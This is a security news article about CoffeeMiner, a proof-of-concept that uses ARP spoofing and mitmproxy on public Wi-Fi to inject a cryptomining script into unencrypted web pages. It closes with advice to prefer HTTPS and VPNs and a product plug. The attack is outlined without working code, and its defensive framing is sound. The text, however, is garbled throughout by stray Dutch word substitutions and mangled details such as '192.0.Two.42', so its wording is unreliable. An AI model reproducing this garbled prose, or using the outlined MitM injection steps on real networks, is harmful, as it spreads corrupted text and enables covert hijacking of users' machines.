CoffeeMiner project lets you hack public Wi-Fi to mine cryptocoins – Naked Security
That’s where someone else uses your laptop, via your web browser, to perform a series of calculations that help to generate some sort of cryptocurrency, and keeps the proceeds for themselves.
Wij’re guessing that the provider figured it would be OK to “borrow” approximately Ten seconds of CPU time whenever someone connected to the Wi-Fi, presumably spil a way of earning a few reserve pennies ter come back for providing free internet access:
(Just for the record, the tweeter wasgoed wrong above, inasmuch spil the code wasgoed mining Monero, not Bitcoin – but the sentiment wasgoed spot-on.)
Starbucks wasn’t affected, and “took swift activity to ensure [the] internet provider resolved the issue”.
Wij’re guessing here, but wij’re ready to assume that this “swift action” involved a very brief phone call ter a rather noisy voice.
But it’s not only the Wi-Fi technicus or the coffee shop proprietor that you need to worry about.
…anyone else ter the coffee shop (or bus, or train, or hotel lounge, or wherever it is) at the same time can sniff out what you’re doing, and perhaps also trick you into observing and doing something you didn’t expect.
Thanks to a “for academic purposes only” project called CoffeeMiner, rogues te your local cafe can now trick you into cryptomining, along with any other web-based cyberdodginess they might have ter mind:
The project is the brainchild of a software developer from Barcelona who goes by the name Arnau Code, and if you overlook its potential for misuse (please read the disclaimer!), wij think it’s a well-prepared tutorial about Man-in-the-Middle MitM) attacks.
If you’ve everzwijn wondered why HTTPS (the padlock te your browser) truly matters, and why every webpagina indeed ought to use it instead of serving up content using plain old HTTP, you should look at Arnau’s article. Don’t just take it from us that HTTPS is about more than secrecy. The CoffeeMiner project is a good reminder that HTTPS is about authenticity and tamper-resistance, too – getting the right stuff from the right place.
A MitM attack is where someone else on the network gets to see your network requests before they set off to their final destination, and can intercept the replies before they get back to you.
Instead of talking directly to the webpagina you’re expecting, you are effectively talking through a middleman, who can alter what you ask ter the very first place, and switch what you see te reply.
Ter other words, every webstek you visit could, ter theory, end up temporarily mining cryptocurrency for someone else.
Simply explained, Coffee Miner:
- Tricks your network card into thinking that the CoffeeMiner is the access point. The open source product dnsiff is used for this part.
- Passes on all your network traffic directly except for web requests.
- Shoves your web traffic into a man-in-the-middle proxy. The open source toolkit mitmproxy is used here.
- Inserts one line of coin-mining HTML into your web replies.
The CoffeeMiner code doesn’t actually inject coin mining code directly, instead it injects a line like this:
The IP number and port (ter this example, 192.0.Two.42:8000) is a web server running on the CoffeeMiner laptop itself – te fact, it’s part of the CoffeeMiner toolkit – that serves up the actual cryptomining code of your choice. (Arnaud Code chose a widepspread miner known spil CoinHive.)
What to do?
This isn’t truly a lesson about cryptomining, however that certainly adds to the intrigue.
The problem here is that on an untrusted network (and that means almost every network you’ll everzwijn use thesis days, because it’s hard to vouch for every user and every device affixed at any uur), a rogue user can very lightly mess with any web traffic that isn’t encrypted using HTTPS.
Without HTTPS, there is no confidentiality, so anyone can see what you are doing and telling, there is no identification, so you have no idea who’s replying, and there is no integrity, because you can’t tell when someone has tampered with what you’ve just downloaded, for example by stuffing a coin mining script into every web pagina.
Spil wij mentioned at the embark:
- Stick to sites that use HTTPS. A web-based MitM attack will almost always trigger a warning that you are connecting via an imposter server.
- Urge sites that don’t yet use HTTPS to commence doing so. It’s a little bit more work, but worth the effort.
- Use a VPN if your work provides one. This encrypts all your network traffic back to head office, not just your web browsing.
By the way, if you want to run a VPN at huis, and you have a spare pc handy, why not attempt the Sophos XG Firewall Huis Edition? You get a free licence for everything the product can do, including anti-virus, web filtering, email security, IPS, plus a fully-fledged VPN.